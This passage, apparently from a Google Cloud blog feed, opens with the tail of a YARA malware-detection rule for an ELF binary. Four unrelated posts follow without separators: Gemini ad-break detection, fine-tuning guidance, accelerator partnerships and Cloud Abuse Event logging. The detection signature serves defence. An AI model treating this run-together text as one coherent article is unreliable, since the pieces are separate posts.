0F 85 CD 00 00 00 jnz loc_5655C128
81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h
0F 85 C0 00 00 00 jnz loc_5655C128
*/
$comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3
1B 0F 85}
condition:
uint32(0) == 0x464c457f and all of them
}
Online video consumption has skyrocketed. A staggering 1.8 billion people globally subscribed to streaming services in 20231, and 92% of internet users worldwide watched online videos every month in 20242. This growth creates a significant opportunity for advertisers who want to reach their customers with great creative, but ineffective ad placement can disrupt their customers’ viewing experiences.
An important way to deliver a better ad experience is seamless ad integration, which means placing ads at natural breaks in video content to avoid interrupting the narrative flow. Scene change detection technology identifies these natural breaks by analyzing a video’s visual, audio, and textual elements. Google’s AI models such as Gemini offer a win-win for viewers and advertisers:
Increased viewer engagement: Seamless ad integration minimizes disruption and enhances the viewing experience.
Higher ad revenue: More relevant ads lead to better click-through rates and increased advertiser ROI.
Simplified workflows: Google Cloud’s Vertex AI platform streamlines the entire video monetization process, from scene detection to ad placement.
To help you maximize the potential of your ad inventory, we’ll share how Google Cloud’s generative AI revolutionizes scene detection, leading to more effective ad placement, improved reach, higher viewer engagement, and ultimately, increased revenue for publishers.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud developer tools’), (‘body’, <wagtail.rich_text.RichText object at 0x3e009c3875e0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
The challenges of traditional ad break detection
Traditional ad break detection methods, designed primarily for structured television content with fade-outs and fixed commercial breaks, often struggle to identify ideal ad placement points in today’s diverse video landscape. These methods—including shot boundary detection, motion analysis, audio analysis, and rule-based systems—can miss subtle transitions, misinterpret rapid movement, operate independently of visual context, lack flexibility, and rely on manual tagging. This is where Google’s Gemini models can help.
Intelligent scene detection with Google’s Gemini models
Gemini’s multimodal capabilities can analyze video, audio, and text simultaneously, enabling a level of nuanced scene understanding that was previously impossible. Now, we can ask Gemini to understand the nuances of video content and generate very granular contextual metadata, unlocking capabilities that were previously impossible to achieve efficiently.
Here are some examples of how Gemini identifies ad breaks and provides detailed contextual metadata:
Ad Break Example
Transition Feeling
Transition Type
Narrative Type
Prior Scene Summary
Daytime to Evening Dinner
Cheerful, relaxed
Outdoor to indoor
Scene transition from plot to end
A group of friends enjoying dinner at a restaurant.
End of Tense Dialogue Scene
Tense, dramatic
Fade-out
Scene of rising conflict
Two characters arguing over a specific issue.
Busy Street to Quiet Cafe
Neutral
Hard cut, outdoor to indoor
Scene transition
A character walking along a busy street.
This enriched metadata allows for the precise matching of the right ad to the right user at the right time. For example, the first ad break (Daytime to Evening Dinner), with its associated sentiment of “cheerful and relaxed,” might be ideal for advertisements that resonate with those feelings such as travel, entertainment or leisure products, rather than just a product like cookware. By understanding not just the basic context, but also the emotional tone of a scene, Gemini facilitates a new level of contextual advertising that is far more engaging for the viewer.
Proof point: The Google Cloud architecture
Google Cloud, powered with the Gemini 1.5 Pro model, delivers a robust and scalable solution for intelligent ad break detection. Its multimodal analysis capabilities simultaneously process video, audio, and text to detect even subtle transitions, enabling seamless ad integration. Gemini’s ability to process up to 2 million tokens ensures comprehensive analysis of long videos across diverse genres with minimal retraining, offering versatility for media providers. This large context window allows the model to analyze approximately 2 hours of video and audio content in a single pass, which significantly reduces processing time and complexity compared to methods that require breaking videos into smaller chunks.
The architecture ensures high performance and reliability through these key stages:
1. Video Ingestion and Storage (GCS): Videos are ingested and stored in Google Cloud Storage (GCS), a highly scalable and durable object storage service offering various storage classes to optimize cost and performance. GCS ensures high availability and accessibility for processing. Robust security measures, including Identity and Access Management (IAM) roles and fine-grained access controls, are in place.
2. Orchestration and simultaneous processing (Vertex AI pipelines & Gemini): Vertex AI pipelines orchestrate the end-to-end video analysis process, ensuring seamless execution of each stage. Vertex AI manages simultaneous processing of multiple videos using Google Gemini’s multimodal analysis, significantly accelerating the workflow while maintaining scalability. This includes built-in safety filters powered by Gemini, which perform a nuanced contextual analysis of video, audio, and text to discern potentially inappropriate content. The results are returned in JSON format, detailing scene change timestamps, video metadata, and contextual insights.
Post-processing is then applied to the JSON output to structure the data in a tabular format, ensuring compatibility with downstream storage and analysis tools. This includes:
Standardizing timestamps: Ensuring uniform time formats for consistent querying and integration.
Metadata mapping: Beyond basic metadata extraction, this stage includes the classification of scenes (or entire video programs) into industry standard taxonomies, such as the IAB’s, or the customer’s own custom taxonomies. This allows for more granular organization of video content based on their type and provides an easier method of ad targeting.
Error handling and data validation: Filtering out incomplete or invalid entries to maintain data quality.
3. Structured data storage and enrichment (BigQuery): The structured data resulting from Gemini’s scene change detection analysis, including timestamps, metadata, and contextual insights, is stored in BigQuery. BigQuery ML can leverage this integrated data to build predictive models for ad placement optimization. For example, you can schedule a 15-second action-themed ad during a scene change in an action sequence, targeting viewers who frequently watch action movies in the evening.
4. Monitoring and logging (GCP operations suite): GCP Operations Suite provides comprehensive monitoring and alerting for the entire pipeline, including real-time visibility into job progress and system health. This includes detailed logging, automated alerts for failures, and dashboards for key performance indicators. This proactive approach ensures timely issue resolution and maximizes system reliability.
Foundation models such as Gemini have revolutionized how we work, but sometimes they need guidance to excel at specific business tasks. Perhaps their answers are too long, or their summaries miss the mark. That’s where supervised fine-tuning (SFT) comes in. When done right, it unlocks incredible precision to tailor Gemini for specialized tasks, domains, and stylistic nuances.
In an earlier blog, we covered when to embrace SFT and how it compares to other methods for optimizing your model’s output. In this blog, we’ll go deeper into how developers can streamline their SFT process, including:
Selecting the optimal model version
Crafting a high quality dataset
Best practices to evaluate the models, including tools to diagnose and overcome problems.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e009c6763d0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
1. Establish a baseline and select your model
First, evaluate your foundation model on a representative dataset before fine-tuning to quantify improvements. This helps you understand its initial capabilities and identify areas for targeted improvement. Here are three key things to analyze:
Initial performance: Assess how the model performs without any training (zero-shot) and potentially with a few examples (few-shot).
Metrics: Select evaluation metrics aligned with your specific task, like exact match, BLEU or ROUGE.
Data: Ensure your evaluation dataset is diverse and representative of the real-world data the model will encounter.
Analyzing these baseline results, especially where the model struggles, is crucial for defining an effective fine-tuning strategy. When fine-tuning Gemini, you have a couple models to choose from:
Gemini 1.5 Pro:Google’s best model for general performance.
Gemini 1.5 Flash:Google’s model that is designed for cost-performance and low latency
Choosing the right model involves two key considerations:
Align the model with your use case: Before using SFT start with the model that most easily achieves your desired functionality. If your application requires high accuracy and complex reasoning, begin with Gemini Pro. If this works, then you can begin to look at cost. For example, you could try SFT on Flash, so that you have better latency and cheaper inference.
Efficiently improving the model with your data: Before fine-tuning a larger model like Gemini Pro, it’s often beneficial to test your tuning data on a smaller, less expensive model like Gemini Flash first. This allows you to verify that your data is actually improving the model’s performance. If the performance is not good enough you can always switch to a larger model. If your tuning data effectively improves the smaller model’s accuracy, then it indicates that your data has good quality, and there is a good chance that tuning the larger model with this data will be effective, too.
Consider your data
SFT isn’t just about throwing labeled data at a model; it’s a nuanced process where the right choices are crucial. To adapt a foundation model for specific tasks, we fine-tune it with a labeled dataset. This dataset contains inputs (like an earnings report) and their desired outputs (like a summary).
Machine learning thrives on data. The success of your supervised fine-tuning depends significantly on the quality of your tuning data. Here are some essential guidelines to follow.
Quality vs quantity
Quality vs. quantity in your training data is crucial. Vertex AI leverages Low-Rank Adaptation (LoRA) for efficient fine-tuning, freezing the original model weights and injecting trainable matrices to adjust model behavior effectively with a small number of trainable parameters. This means faster fine-tuning, fewer resources, and less reliance on massive datasets.
Focus on high-quality examples that are:
Relevant: Closely aligned with your specific fine-tuning task.
Diverse: Covering a wide range of potential inputs and scenarios.
Accurate: Featuring correct labels and outputs.
While more data can improve a model, it often needs fewer training epochs and at some point you might have diminishing returns. It’s not worth tuning on the same cluster over and over again.A smaller, refined and representative dataset often outperforms a large, noisy one. Small datasets have the risk of overfitting, so you may want to control your number of epochs. You can start with around 100 examples to validate the effectiveness of tuning. Then scale up to cover more corner cases or categories.
Data pre-processing
Pre-processing is a critical step in preparing data for supervised fine-tuning of large language models (LLMs). Research has shown that one of the most crucial pre-processing steps is deduplication. which involves identifying and removing duplicate data points. Duplicate examples in training data can lead to several issues: memorization, which hinders generalization; and inefficient training, as the model redundantly learns from similar clusters. Duplicate or near-duplicate examples between training and validation/test sets causes data leakage, artificially inflating performance.
For deduplication, leverage techniques like exact and fuzzy matching, and clustering. Tools like ExactSubstr deduplication can efficiently handle larger datasets. Furthermore, explore data augmentation to enhance data diversity and model robustness.
Be aware that pre-processing can also help with evaluating the performance of your fine-tuned model. For example you might want to deal with letter cases, remove extra whitespace and deal with punctuation.
2. Add instructions to your dataset
Including instructions in your fine-tuning dataset helps boost the performance. The model learns to condition its output on the given instructions, improving its ability to perform the desired task and generalize to similar, unseen instructions. Reducing the need for lengthy and complex prompts during inference. There are two primary methods: system instructions and text prompts, both are optional but can improve the performance.
System instructions provide global directives, shaping the overall response style. For example, "Answer in JSON format" enforces structured outputs, while "You are an expert in bioinformatics" sets the response domain. `.
Instance-level instructions offer example-specific guidance embedded within the model input. For instance, "Summarize the following research paper, focusing on the methodology and key findings:"directs the model to extract specific information.
Experimenting with different instruction styles, informed by resources like the Gemini prompting strategies, is important. You can experiment by prompting the Gemini model before adding the instruction to the dataset. Adding few-shot examples to your dataset will not give additional benefit. Crucially, ensure the prompts and instructions used in your fine-tuning dataset closely resemble those you plan to use in production. This alignment is vital for optimal performance.
Training-serving skew
A critical factor influencing fine-tuning effectiveness is the alignment between your tuning data and production data. Divergence in aspects like format, context, or example distribution can significantly degrade model performance. For instance, if your tuning data consists of formal language examples and your production data includes informal social media text, the model may struggle with sentiment analysis. To prevent this, carefully analyze your training and production data. Techniques like data augmentation and domain adaptation can further bridge the gap and enhance the model’s generalization capabilities in production.
Focus on complex examples
When fine-tuning, it’s tempting to throw all your data at the model and hope for the best. However, a more strategic approach focuses on examples that the base model finds difficult.
Instead, identify the specific areas where the model struggles. By curating a dataset of these challenging examples, you can achieve more significant improvements with less data. This targeted approach not only boosts performance but also makes your fine-tuning process more efficient. During the benchmarking process, analyze the model’s performance on a diverse dataset. Identify examples where the model struggles with specific tasks, formats, or reasoning abilities. Then add these examples to your training dataset and you might want to find extra examples and add those to your evaluation dataset to prevent leakage.
The importance of a validation dataset
Always incorporate a well-structured validation dataset into your fine-tuning process. This separate set of labeled data serves as an independent benchmark to evaluate your model’s performance during training, helping you to identify overfitting and choose the epochs to stop training at, and ensuring the model generalizes well to unseen data. The validation dataset should be representative of the real-world data that will be used during inference.
Data formatting
In supervised fine-tuning, the model learns from a labeled dataset of input-output pairs. To use SFT for Gemini your data needs to be in a specific format in a JSONL file. Adding instructions to your dataset helps guide the model during the fine-tuning process. You can add a systemInstruction and additional instructions to the contents fields, each containing role and parts to represent the conversation flow and content. You do this for each of the lines (sample) in your JSON file. For instance, a systemInstruction might specify the persona of the LLM, while the contents would include the user query and the desired model response. A well-structured dataset in the correct format is crucial for effective knowledge transfer and performance improvement during fine-tuning. Here’s an example (datapoint) of the required format for your dataset:
code_block
<ListValue: [StructValue([(‘code’, ‘{ “systemInstruction”: { “role”: “system”, “parts”: [ { “text”: “You are a helpful and harmless AI assistant.” } ] }, rn “contents”: [ rn { “role”: “user”, “parts”: [ { “text”: “What is the capital of France?” } ] }, rn { “role”: “model”, “parts”: [ { “text”: “The capital of France is Paris.” } ] } rn ] rn}’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e009c676850>)])]>
3. Hyperparameters and performance
When you start with fine-tuning it’s important to choose the right hyperparameters. Hyperparameters are the external configuration settings that govern the training process of a large language model which ultimately determine the model’s performance on a given task. When fine-tuning Gemini you can follow the guidance below to set the hyperparameters (epochs, learning rate multiplier and adapter size):
Gemini 1.5 Pro
Textfine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs = 20, learning rate multiplier = 10,adapter size = 4. With a dataset size >= 1000 examples or average context length >= 500, we recommend epochs = 10, learning rate multiplier = default or 5,adapter size = 4.
Image fine-tuning: with a dataset size of ~1000 examplesstart with epochs = 15, learning rate multiplier = 5 and adapter size = 4. Increase the number of epochs when you have <1000 samples and decrease when you have >1000 examples.
Audio fine-tuning: we recommend setting epochs = 20, learning rate = 1 and adapter size = 4.
Gemini 1.5 Flash
Textfine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs = default, learning rate multiplier = 10 and adapter size = 4. With a dataset size >= 1000 examples or average context length >= 500, we recommend epochs = default, learning rate multiplier = default and adapter size = 8.
Image fine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs >=15 (increase when you have less examples), learning rate multiplier = 5 and adapter size = 16. With a dataset size of >= 1000 examples or average context length >= 500, we recommend setting epochs <=15 (decrease when you have me examples), learning rate multiplier = default and adapter size = 4.
Audio fine-tuning: we recommend setting epochs = 20, learning rate = 1 and adapter size = 4.
Audio use cases like Automated Speech Recognition (ASR) use cases might need a higher epochs setting to reach optimal results. Start with the settings mentioned above and based on your evaluation metrics you can increase the number of epochs.
After your initial run, iterate by adjusting the hyperparameters and closely monitoring key training and evaluation metrics. key training metrics. Two primary metrics to monitor during fine-tuning are:
Total loss measures the difference between predicted and actual values. A decreasing training loss indicates the model is learning. Critically, observe the validation loss as well. A significantly higher validation loss than training loss suggests overfitting.
Fraction of correct next step predictions measures the model’s accuracy in predicting the next item in a sequence. This metric should increase over time, reflecting the model’s growing accuracy in sequential prediction.
Monitor these metrics for both your training and validation datasets to ensure optimal performance depending on the task, consider other relevant metrics. To monitor your fine-tuning job, use the Google Cloud Console or Tensorboard. An “ideal” scenario for the metrics would be something like this:
Remember: These are just starting points. Experimentation is key to finding the optimal hyperparameters for your specific fine-tuning task.You might also want to follow some of the best steps below based on the performance of your fine-tuning experiment.
Suboptimal performance
How to spot this: Training loss and validation loss decrease as training progresses, but the validation loss does not converge or reach a minimum.
Possible causes:The training dataset may be too small or lack sufficient diversity to represent the real-world scenarios the model will encounter.
How to alleviate: Increase the number of epochs or the learning rate multiplier to speed up the training. If that doesn’t work you can gather more data.
Overfitting
How to spot this: During training, the training loss decreases consistently, but the validation loss decreases initially and then starts to increase. This divergence indicates that the model is learning the training data too well and is failing to generalize to new data.
Cause: The model has too much capacity (e.g., too many layers or parameters) relative to the size and complexity of the training data.
How to alleviate: Decrease the number of epochs to the point where validation loss reaches the minimum. Or Increase the effective size and diversity of the training data.
Potential data issues
How to spot this: The initial loss of training data is very high (>10) indicates that the model’s prediction is very far from the label.
Cause: There could be issues with your training dataset. One typical example is that the input length exceeds the maximum context length, which leads to truncation.
How to alleviate: Double check your training dataset to make sure it follows the best practice from the previous section.
Evaluate your model
Evaluating the performance of fine-tuned language models is crucial for understanding its performance, checkpoint selection and hyperparameter optimization. Evaluation can be challenging for generative models, as their outputs are often open-ended and creative. To gain a holistic understanding of performance, it’s best to combine different evaluation approaches, primarily utilizing a blend of auto-metrics and model-based evaluation, potentially calibrated with human evaluation.
Auto-metrics: These metrics provide quantitative measures by comparing the model’s output to a ground truth. While they may not capture nuanced aspects like factuality, they remain valuable due to their:
Speed: Auto-metrics are computationally inexpensive and fast to calculate.
Objectivity: They offer consistent, objective measurements, enabling reliable progress tracking and model comparisons.
Interpretability: Metrics like accuracy, F1 score, or BLEU are widely understood and provide readily interpretable results.
It’s crucial to select appropriate auto-metrics based on the task. For instance:
BLEU Score (translation and summarization): Measures n-gram overlap between generated and reference text, focusing on precision.
ROUGE (summarization): Evaluates n-gram overlap with an emphasis on recall.
Model-based metrics: These methods leverage a language model as a judge (Autorator) to assess the quality of generated output based on predefined criteria, aligning more closely with the task evaluation rubrics. For example, you might use model based evaluation to assess the factual accuracy or logical consistency of a response.
Human Evaluation: While human judgment remains the gold standard, its cost and scalability limitations make it less practical for continuous evaluation during fine-tuning. Instead, we can strategically use human evaluation to calibrate model-based evaluators (autoraters). This involves collecting a smaller but high-quality dataset of human judgments and training the autorater to mimic these judgments. We can then rely on the autorater during the tuning process and conduct a final round of validation with human raters to ensure the chosen checkpoint meets the desired quality standards.
What’s next?
Ready to get started? Dive into our Generative AI repository and explore notebooks like our how to use supervised fine tuning. Experience the transformative potential of SFT on Vertex AI, and tailor your AI applications for peak performance and customization.
Want to fine-tune a Gemini model? Head over to the Vertex AI documentation to see which ones you can customize.
If you want to learn more about Generative AI and fine-tuning please have a look at our 5-Day Gen AI Intensive Course.
A special thanks to May Hu, Yanhan Hou, Xi Xiong, Sahar Harati, Emily Xue and Mikhail Chrestkha from Google Cloud for their contributions.
At Google Cloud, we focus on building the most competitive and powerful network of support for startups. One of the ways we show our support is by partnering with investors, accelerators, and incubators to deliver the resources and benefits that help startups succeed.
For example, we are proud to partner with marquee institutions who invest in the next generation of founders like Y Combinator. We have also extended our network of partnerships to accelerators worldwide who support founders with mentorship, education, and in some cases, investment, such as ERA and AI2 Incubator.
In 2024, we worked with over 300 accelerators worldwide to help thousands of startups and over 3,000 founders build with Google. We’ve extended benefits to these startups including access to Startup Success Managers, Customer Engineers, and AI product teams, dedicated packages of credits, and technical programming like workshops and office hours.
Today, we’re proud to announce our latest partnerships with three more accelerators – Berkeley SkyDeck, Upekkha, and UnternehmerTUM – and highlight some of the companies we’re supporting through them.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e00b12d2790>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Introducing our latest accelerator partnerships
Berkeley SkyDeckis the only university accelerator partnering with a leading venture capital fund. Berkeley’s mission emphasizes long-term societal benefit, and prioritizes companies that align with this vision. Several SkyDeck companies are already running on Google Cloud, including:
Deeli AI, an AI-powered platform that helps companies discover and evaluate emerging technologies to make informed investment decisions. They currently build their product and data pipeline on various services such as GCE, Cloud Run, and Dataflow, and interact with models from the Vertex AI Model Garden.
ContextQA is Agentic AI for software testing, providing 12x the value by enabling accurate, user-centric test automation from day zero of development and helps to deliver bug-free product 40% faster. ContextQA uses Gemini models to continuously compare actual application behavior with expected behavior, adapting automatically to new changes for immediate agility.
T-Robotics provides pre-trained AI skills for robots that make commercial robots intelligent and robust. These skills are programmed through a conversational robot agent that leverages visual, haptic, action and language models – including Google Cloud’s Gemini – to seamlessly interpret and adapt to diverse industrial environments.
“Our partnership with Google Cloud enables startups to build better and faster, which is crucial for their success. Beyond the technology and services provided, we foster meaningful connections between our startups and Googlers, facilitating discussions on industry trends and innovations in AI.” – Taylor Marcus, Head of Business Development at Berkeley Skydeck
Upekkhahelps Indian founders build vertical AI companies that sell globally, with intense coaching, a network of founders, and capital. Google Cloud is partnering with them to support:
Outpost is a platform for AI/ML and data teams to train, fine tune, and deploy genAI models with managed infrastructure, tools, and workflows.
Labellerr‘s data labeling engine uses automated annotation, and smart QA, processing millions of images and thousands of hours of videos in just a few weeks using Google Vertex AI Integration and Cloud Run, which previously took months for ML teams.
Bynry’s SMART360 leverages Google Cloud’s robust infrastructure to empower small and mid-sized utilities to enhance operational efficiency and customer satisfaction.
“Google Cloud has technology that just works. You can tell they actually listen to developers. They don’t just give out credits; they help founders understand how to use their technology.” – Thiyagarajan Maruthavanan (Rajan) – Managing Partner, Upekkha
UnternehmerTUMis the leading center for innovation and business creation in Europe with more than 50 high-growth technology start-ups every year, and offers complete service from initial idea to IPO. Startups supported by them include:
Kraftblock’s innovative technology offers unparalleled large-scale, long-duration energy storage, empowering industries to transition towards sustainable thermal processes. The green tech company is using Google’s Compute Engine to power their simulations.
tulanā’s highly customizable platform uses forecasting, optimization, simulation and AI to help enterprise clients take better decisions across their supply chains. tulanā is using Google Cloud Run to horizontally scale its optimization workloads, Google’s Gemini model for intelligent ETL processes, and Cloud SQL and Big Query to store customer data.
SE3 Labs specializes in 3D computer vision and AI. They develop advanced technologies to create “Spatial GPTs,“ which are essentially AI models that can understand and interact with the world in 3D. The startup loves using Google Cloud Run for their deployment.
“We chose to partner with Google Cloud because their innovation-driven approach aligns closely with our mission to empower high-tech startups. Google Cloud’s advanced infrastructure, AI, and data analytics capabilities offer exceptional tools that support our founders in building robust, scalable solutions, from market entry to growth.”– Barbara Mehner, Managing Partner at XPRENEURS by UnternehmerTUM
Building on a history of support with accelerators
These new partnerships expand on our existing work with accelerators to help bring leading cloud, AI models, and AI-optimized infrastructure to the companies they support. These include:
500 Global is a multi-stage venture capital firm. Its investments and flagship accelerator help founders with access to a supportive global network of those who’ve successfully built startups before. Notable alumni include Intercom, Talkdesk, Innovaccer, Babylist and Solana.
Techstars provides individualized care with its small cohort size and mentor-driven approach across more than 30 cities worldwide.
Antler is a global early-stage VC that operates in 30 cities across major entrepreneurial hubs, with a proven process to back founders from pre-seed to Series C. Their flagship Residency Program empowers founders to find the right co-founders, validate and build ideas rapidly, and secure funding to launch and scale impactful ventures.
StartX is the non-profit startup community, accelerator, and fellowship program for over 2,500 Stanford University founders, offering support without requiring equity.
Plug and Play operates over 100 accelerator programs globally, accelerating more than 2,500 startups annually. Its portfolio includes over 30 unicorns and a network of 90,000 startups worldwide. They offer mentorship and access to a vast network of investors and industry leaders.
Gener8toroffers 75 programs globally, each with a highly selective, concierge-level experience startups that are selected.
MassChallengestands out as an impact-focused, zero-equity accelerator, which allows startups to receive world-class support without giving up any ownership.
IIT Madras Incubation Cell is deeply integrated with India’s top engineering institute and provides a unique ecosystem that nurtures R&D-driven, deep-tech startups.
nasscom GenAI Foundryoffers Indian GenAI startups access to GPU resources, fundraising, paid pilot and showcase opportunities, enablement on go-to-market, technology, Responsible AI, and intellectual property, through a network of 3,500+ industry members and subject matter experts.
Lanzadera is a prominent accelerator in Spain, unique in its adoption of a management model that drove its founder’s success in business, and its close collaboration with the business school EDEM and investment fund Angels, creating a flywheel of innovation.
We’re excited about all of the opportunities that will come from these new partnerships, as well as the increasing value of relationships we have with other accelerators. All of these programs and strategies illustrate our ever-expanding commitment to founders and startups that stand on the front lines of innovation.
Learn more
Companies who work with these accelerators should reach out to their accelerator Program Manager to learn more about getting started with Google Cloud.
At Google Cloud, we are deeply committed to partnering with our customers to help achieve stronger security outcomes.
As a part of this commitment, we’re excited to announce that Google Cloud customers can now track Cloud Abuse Events using Cloud Logging. These events can include leaked service account keys, crypto mining incidents, and malware.
When we identify one of these abuse issues that’s affecting your cloud resources, you’ll now receive two detailed notifications: one in a structured log format, and an email notification.
Cloud Abuse Event Logging is focused on providing a more efficient and effective method for customers to receive important abuse and security notifications. Previously, notifications were sent to customers only in an email, which at times created challenges around consistency, automation, and continuity.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3eea113e8b80>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
In response to customer feedback, we developed Cloud Abuse Event Logging to help supplement email notifications. By leveraging these log notifications, customers can consume these logs and develop consistent automated processes to resolve abuse and security issues more efficiently and effectively. Here are few benefits:
Direct access in Cloud Logging: These notifications are readily available as logs in Cloud Logging, making them easier to find and manage.
Enhanced automation: The structured log format allows you to integrate these notifications into your existing security monitoring and incident response systems, which can help reduce the time it takes to address potential threats.
Historical trend analysis: Gain insights into past abuse events to identify patterns and proactively strengthen your security measures.
This new logging system reinforces our commitment to our customers, aligns with our shared fate model, and makes Google Cloud more secure. Cloud Abuse Events are provided on a best-effort basis to assist you in identifying potential abuse and we encourage you to combine these notifications with your own security practices for comprehensive protection.
Monitoring and dashboarding
This new integration of Cloud Abuse Events with Cloud Logging helps you strengthen your security with automated and timely notifications. You can use Cloud Monitoring to observe trends in your logs and notify you when specific conditions are met, such as receiving important types of abuse events. For example, based on the logs provided via Cloud Abuse Events, you can configure an alerting policy to notify you whenever we’ve become aware that your service account key has been leaked to the public.
You can also set up custom dashboards for your logs to get insights into the overall health and security of your environment. Cloud Abuse Events in Cloud Logging gives you many flexible options to effectively manage your security and monitoring. For example, if you’d like to aggregate the logs from each project in one place, an aggregate sink at the organization level may be useful. Additionally, you can use Log Analytics to run queries that analyze your log data, which allows you to easily chart and query results and can help uncover patterns and trends in your logs.
Automate response to abuse events
There are several ways to detect and respond to Cloud Logging events in real-time. For example, if you would like to configure automated deprovisioning of a VM after cryptomining has been detected on the instance, you can follow these steps:
Create a Logging sink to direct crypto mining related Abuse Events to your business logic. You can use the following filters to isolate these logs:
Create a Pub/Sub topic. The Logging sink will route the filtered Abuse Events to this topic. It initiates Cloud Functions asynchronously based on the Abuse Events via a Pub/Sub message.
You can ingest Cloud Abuse Event logs into Google Security Operations which lets you store, search, and examine aggregated security information for your enterprise. If you prefer to export your abuse logs to an external security information and event management system (SIEM) for further analysis or custom automation, you’ll need to route your logs to a supported destination, such as a Google Cloud Storage bucket or a Pub/Sub topic that can provide support for third-party integrations.
You can learn more about responding to abuse notifications and warnings by visiting our documentation. For technical information about our Cloud Abuse Event log payload format, please click here.